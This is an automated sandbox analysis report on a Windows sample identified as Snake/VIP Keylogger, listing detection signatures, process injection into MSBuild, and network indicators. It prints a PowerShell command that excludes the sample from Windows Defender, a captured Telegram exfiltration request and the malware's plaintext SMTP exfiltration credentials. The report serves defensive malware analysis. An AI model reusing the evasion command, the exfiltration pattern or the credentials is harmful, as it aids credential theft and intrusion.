Edit tour

Windows Analysis Report
Nowe zam.exe

Overview

General Information

Sample name:	Nowe zam.exe
Analysis ID:	1551046
MD5:	d29c5fb95585ed107d8473d204d520ae
SHA1:	4a008ac6426aa63e7fbb7ce25810342efaeb6607
SHA256:	5a8467ab773f458f57d5942d6fe612c5048c50b19e7d63c82ff1eac99a324e2b
Tags:	exeuser-Maciej8910871
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: MSBuild connects to smtp port

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Nowe zam.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\Nowe zam.exe" MD5: D29C5FB95585ED107D8473D204D520AE)

powershell.exe (PID: 3800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 1016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d5df:$a1: get_encryptedPassword 0x2d8fc:$a2: get_encryptedUsername 0x2d3ef:$a3: get_timePasswordChanged 0x2d4f8:$a4: get_passwordField 0x2d5f5:$a5: set_encryptedPassword 0x2ecb8:$a7: get_logins 0x2ec1b:$a10: KeyLoggerEventArgs 0x2e880:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dcc7:$a1: get_encryptedPassword 0x70ee7:$a1: get_encryptedPassword 0xb3f07:$a1: get_encryptedPassword 0x2dfe4:$a2: get_encryptedUsername 0x71204:$a2: get_encryptedUsername 0xb4224:$a2: get_encryptedUsername 0x2dad7:$a3: get_timePasswordChanged 0x70cf7:$a3: get_timePasswordChanged 0xb3d17:$a3: get_timePasswordChanged 0x2dbe0:$a4: get_passwordField 0x70e00:$a4: get_passwordField 0xb3e20:$a4: get_passwordField 0x2dcdd:$a5: set_encryptedPassword 0x70efd:$a5: set_encryptedPassword 0xb3f1d:$a5: set_encryptedPassword 0x2f3a0:$a7: get_logins 0x725c0:$a7: get_logins 0xb55e0:$a7: get_logins 0x2f303:$a10: KeyLoggerEventArgs 0x72523:$a10: KeyLoggerEventArgs 0xb5543:$a10: KeyLoggerEventArgs
Process Memory Space: Nowe zam.exe PID: 6828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Nowe zam.exe PID: 6828	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Nowe zam.exe PID: 6828	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Nowe zam.exe PID: 6828	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Nowe zam.exe PID: 6828	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x54b4a:$a1: get_encryptedPassword 0x54e5d:$a2: get_encryptedUsername 0x54964:$a3: get_timePasswordChanged 0x54a6d:$a4: get_passwordField 0x54b60:$a5: set_encryptedPassword 0x5700d:$a7: get_logins 0x56f70:$a10: KeyLoggerEventArgs 0x56bd9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: MSBuild.exe PID: 1016	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 1016	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: MSBuild.exe PID: 1016	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 1016	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xdcbee:$a1: get_encryptedPassword 0xdcf01:$a2: get_encryptedUsername 0xdca08:$a3: get_timePasswordChanged 0xdcb11:$a4: get_passwordField 0xdcc04:$a5: set_encryptedPassword 0xdf0b1:$a7: get_logins 0xdf014:$a10: KeyLoggerEventArgs 0xdec7d:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.MSBuild.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.MSBuild.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.MSBuild.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.MSBuild.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d7df:$a1: get_encryptedPassword 0x2dafc:$a2: get_encryptedUsername 0x2d5ef:$a3: get_timePasswordChanged 0x2d6f8:$a4: get_passwordField 0x2d7f5:$a5: set_encryptedPassword 0x2eeb8:$a7: get_logins 0x2ee1b:$a10: KeyLoggerEventArgs 0x2ea80:$a11: KeyLoggerEventArgsEventHandler
4.2.MSBuild.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b520:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3abc3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae20:$a4: \Orbitum\User Data\Default\Login Data 0x3b7ff:$a5: \Kometa\User Data\Default\Login Data
4.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e40b:$s1: UnHook 0x2e412:$s2: SetHook 0x2e41a:$s3: CallNextHook 0x2e427:$s4: _hook
0.2.Nowe zam.exe.41bb708.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nowe zam.exe.41bb708.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Nowe zam.exe.41bb708.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Nowe zam.exe.41784e8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nowe zam.exe.41784e8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Nowe zam.exe.41784e8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Nowe zam.exe.41bb708.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nowe zam.exe.41bb708.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Nowe zam.exe.41bb708.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Nowe zam.exe.41bb708.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Nowe zam.exe.41784e8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b9df:$a1: get_encryptedPassword 0x2bcfc:$a2: get_encryptedUsername 0x2b7ef:$a3: get_timePasswordChanged 0x2b8f8:$a4: get_passwordField 0x2b9f5:$a5: set_encryptedPassword 0x2d0b8:$a7: get_logins 0x2d01b:$a10: KeyLoggerEventArgs 0x2cc80:$a11: KeyLoggerEventArgsEventHandler
0.2.Nowe zam.exe.41784e8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nowe zam.exe.41784e8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Nowe zam.exe.41784e8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Nowe zam.exe.41784e8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Nowe zam.exe.41bb708.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b9df:$a1: get_encryptedPassword 0x2bcfc:$a2: get_encryptedUsername 0x2b7ef:$a3: get_timePasswordChanged 0x2b8f8:$a4: get_passwordField 0x2b9f5:$a5: set_encryptedPassword 0x2d0b8:$a7: get_logins 0x2d01b:$a10: KeyLoggerEventArgs 0x2cc80:$a11: KeyLoggerEventArgsEventHandler
0.2.Nowe zam.exe.41bb708.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d7df:$a1: get_encryptedPassword 0x707ff:$a1: get_encryptedPassword 0x2dafc:$a2: get_encryptedUsername 0x70b1c:$a2: get_encryptedUsername 0x2d5ef:$a3: get_timePasswordChanged 0x7060f:$a3: get_timePasswordChanged 0x2d6f8:$a4: get_passwordField 0x70718:$a4: get_passwordField 0x2d7f5:$a5: set_encryptedPassword 0x70815:$a5: set_encryptedPassword 0x2eeb8:$a7: get_logins 0x71ed8:$a7: get_logins 0x2ee1b:$a10: KeyLoggerEventArgs 0x71e3b:$a10: KeyLoggerEventArgs 0x2ea80:$a11: KeyLoggerEventArgsEventHandler 0x71aa0:$a11: KeyLoggerEventArgsEventHandler
0.2.Nowe zam.exe.41bb708.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39720:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38dc3:$a3: \Google\Chrome\User Data\Default\Login Data 0x39020:$a4: \Orbitum\User Data\Default\Login Data 0x399ff:$a5: \Kometa\User Data\Default\Login Data
0.2.Nowe zam.exe.41784e8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d7df:$a1: get_encryptedPassword 0x709ff:$a1: get_encryptedPassword 0xb3a1f:$a1: get_encryptedPassword 0x2dafc:$a2: get_encryptedUsername 0x70d1c:$a2: get_encryptedUsername 0xb3d3c:$a2: get_encryptedUsername 0x2d5ef:$a3: get_timePasswordChanged 0x7080f:$a3: get_timePasswordChanged 0xb382f:$a3: get_timePasswordChanged 0x2d6f8:$a4: get_passwordField 0x70918:$a4: get_passwordField 0xb3938:$a4: get_passwordField 0x2d7f5:$a5: set_encryptedPassword 0x70a15:$a5: set_encryptedPassword 0xb3a35:$a5: set_encryptedPassword 0x2eeb8:$a7: get_logins 0x720d8:$a7: get_logins 0xb50f8:$a7: get_logins 0x2ee1b:$a10: KeyLoggerEventArgs 0x7203b:$a10: KeyLoggerEventArgs 0xb505b:$a10: KeyLoggerEventArgs
0.2.Nowe zam.exe.41784e8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39720:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38dc3:$a3: \Google\Chrome\User Data\Default\Login Data 0x39020:$a4: \Orbitum\User Data\Default\Login Data 0x399ff:$a5: \Kometa\User Data\Default\Login Data
0.2.Nowe zam.exe.41bb708.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b520:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e540:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3abc3:$a3: \Google\Chrome\User Data\Default\Login Data 0x7dbe3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae20:$a4: \Orbitum\User Data\Default\Login Data 0x7de40:$a4: \Orbitum\User Data\Default\Login Data 0x3b7ff:$a5: \Kometa\User Data\Default\Login Data 0x7e81f:$a5: \Kometa\User Data\Default\Login Data
0.2.Nowe zam.exe.41bb708.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c60b:$s1: UnHook 0x2c612:$s2: SetHook 0x2c61a:$s3: CallNextHook 0x2c627:$s4: _hook
0.2.Nowe zam.exe.41784e8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b520:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e740:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc1760:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3abc3:$a3: \Google\Chrome\User Data\Default\Login Data 0x7dde3:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0e03:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae20:$a4: \Orbitum\User Data\Default\Login Data 0x7e040:$a4: \Orbitum\User Data\Default\Login Data 0xc1060:$a4: \Orbitum\User Data\Default\Login Data 0x3b7ff:$a5: \Kometa\User Data\Default\Login Data 0x7ea1f:$a5: \Kometa\User Data\Default\Login Data 0xc1a3f:$a5: \Kometa\User Data\Default\Login Data
0.2.Nowe zam.exe.41784e8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c60b:$s1: UnHook 0x2c612:$s2: SetHook 0x2c61a:$s3: CallNextHook 0x2c627:$s4: _hook
0.2.Nowe zam.exe.41784e8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e40b:$s1: UnHook 0x7162b:$s1: UnHook 0xb464b:$s1: UnHook 0x2e412:$s2: SetHook 0x71632:$s2: SetHook 0xb4652:$s2: SetHook 0x2e41a:$s3: CallNextHook 0x7163a:$s3: CallNextHook 0xb465a:$s3: CallNextHook 0x2e427:$s4: _hook 0x71647:$s4: _hook 0xb4667:$s4: _hook
0.2.Nowe zam.exe.41bb708.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e40b:$s1: UnHook 0x7142b:$s1: UnHook 0x2e412:$s2: SetHook 0x71432:$s2: SetHook 0x2e41a:$s3: CallNextHook 0x7143a:$s3: CallNextHook 0x2e427:$s4: _hook 0x71447:$s4: _hook
Click to see the 28 entries

Sigma Signatures

Networking

Sigma detected: MSBuild connects to smtp port

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 212.44.112.138, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1016, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49741

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nowe zam.exe", ParentImage: C:\Users\user\Desktop\Nowe zam.exe, ParentProcessId: 6828, ParentProcessName: Nowe zam.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", ProcessId: 3800, ProcessName: powershell.exe

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1016, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49713

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nowe zam.exe", ParentImage: C:\Users\user\Desktop\Nowe zam.exe, ParentProcessId: 6828, ParentProcessName: Nowe zam.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", ProcessId: 3800, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T12:49:10.966242+0100	2803305	3	Unknown Traffic	192.168.2.12	49716	188.114.96.3	443	TCP
2024-11-07T12:49:15.186421+0100	2803305	3	Unknown Traffic	192.168.2.12	49724	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T12:49:08.847175+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49713	158.101.44.242	80	TCP
2024-11-07T12:49:10.237782+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49713	158.101.44.242	80	TCP
2024-11-07T12:49:11.659674+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49717	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Nowe zam.exe

Avira: detected

Found malware configuration

Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Nowe zam.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Nowe zam.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Nowe zam.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49714 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49722 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49733 version: TLS 1.2

Source: Nowe zam.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 4x nop then jmp 090D4DF5h	0_2_090D48EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00F2F45Dh	4_2_00F2F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00F2F45Dh	4_2_00F2F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00F2FC19h	4_2_00F2F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065B31E0h	4_2_065B2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BE501h	4_2_065BE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065B0D0Dh	4_2_065B0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065B1697h	4_2_065B0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065B2C19h	4_2_065B2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_065B0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BE0A9h	4_2_065BDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BE959h	4_2_065BE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BF209h	4_2_065BEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BCF49h	4_2_065BCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BD7F9h	4_2_065BD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065B31E0h	4_2_065B2DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BEDB1h	4_2_065BEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BF661h	4_2_065BF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_065B0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_065B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BFAB9h	4_2_065BF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BD3A1h	4_2_065BD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065B31E0h	4_2_065B310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065BDC51h	4_2_065BD9A8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.12:49741 -> 212.44.112.138:587

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2007/11/2024%20/%2019:53:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

